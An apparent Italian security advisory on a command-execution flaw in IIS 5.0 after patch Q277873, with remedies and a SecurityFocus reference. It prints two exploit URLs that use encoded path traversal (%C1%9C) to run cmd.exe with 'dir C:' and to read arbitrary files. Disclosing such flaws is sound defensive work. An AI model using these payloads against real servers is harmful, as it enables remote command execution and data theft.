Nessun risultato. Prova con un altro termine.
Guide
Notizie
Software
Tutorial

Esecuzione di comandi sul server (IIS 5.0 + PATCH Q277873)

Il bug scoperto dalla Georgi Guninski Security Research
Il bug scoperto dalla Georgi Guninski Security Research
Link copiato negli appunti

I sistemi ai quali è stata applicata la patch Q277873, per la risoluzione dei
problemi relativi al "Web Server File Request Parsing" sono esposti ad un
attacco che rende possibile l'esecuzione arbitraria di un qualunque programma
sul web server (maggiori informazioni su http://www.guninski.com/iisasp.html).

Ad esempio la URL: http://www.target.com/scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C: esegue il comando "DIR C:". Ma è anche possibile leggere molti altri file usando: http://www.target.com/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctest.txt 

Rimedi:
Un
rimedio potrebbe essere quello di non installare la patch citata ma questo
consentirebbe l'esposizione alla precedente vulnerabilità.
Per informazioni è
bene monitorara l'archivio di Security Focus dedicato all'argomento
all'indirizzo: http://www.securityfocus.com/bid/1912.


Ti consigliamo anche